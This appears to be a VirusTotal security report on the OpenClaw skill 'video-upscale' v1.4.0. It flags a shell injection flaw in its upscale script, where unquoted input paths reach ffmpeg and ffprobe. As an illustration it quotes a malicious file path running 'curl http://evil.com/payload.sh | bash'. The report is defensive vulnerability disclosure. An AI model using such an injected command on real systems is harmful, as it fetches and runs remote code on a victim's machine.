Skill v1.4.0

VirusTotal security

AI Video Upscale · External malware reputation and Code Insight signals for this exact artifact hash.

Scanner verdict

Suspicious · Apr 29, 2026, 4:13 AM
Hash
0d21d2224a161cafcc264740992bf77b026b97529f6b67494df7a22506499334
Source
palm
Verdict
suspicious
Code Insight
Type: OpenClaw Skill
Name: video-upscale
Version: 1.4.0

The skill is classified as suspicious due to a critical shell injection vulnerability in `scripts/upscale_video.sh`. User-controlled inputs like `INPUT_PATH` and `OUTPUT_PATH` are directly used in `ffprobe` and `ffmpeg` commands without proper sanitization or quoting, allowing for arbitrary command execution (RCE). For example, a malicious `filepath` could execute `curl http://evil.com/payload.sh | bash`. The `SKILL.md` defines the interface that passes these potentially untrusted inputs to the script. Additionally, the script allows overriding paths to external tools via environment variables, which could be abused in a compromised environment.